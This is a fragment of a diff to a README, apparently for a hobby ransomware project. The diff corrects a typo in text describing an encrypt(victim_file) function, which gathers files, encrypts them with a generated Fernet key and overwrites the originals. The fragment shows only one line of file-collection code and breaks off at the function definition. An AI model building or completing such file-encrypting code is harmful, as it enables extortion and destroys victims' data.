cybereagle2001/Ransome/README.md

                 victim_file.append(root+'/'+file)
 ```

 encrypt(victim_file) is the function that I wrote in order to encrypt the stored files using the fernet algorithm for that we need to generate a key and then use it to encrypt the files.
-To do so we are going to retrieve the content of the files as binary encrypt it and overright the files. thi sprocess is done by this code :
+To do so we are going to retrieve the content of the files as binary encrypt it and overright the files. this process is done by this code :

 ```
 def encrypt(victim_file):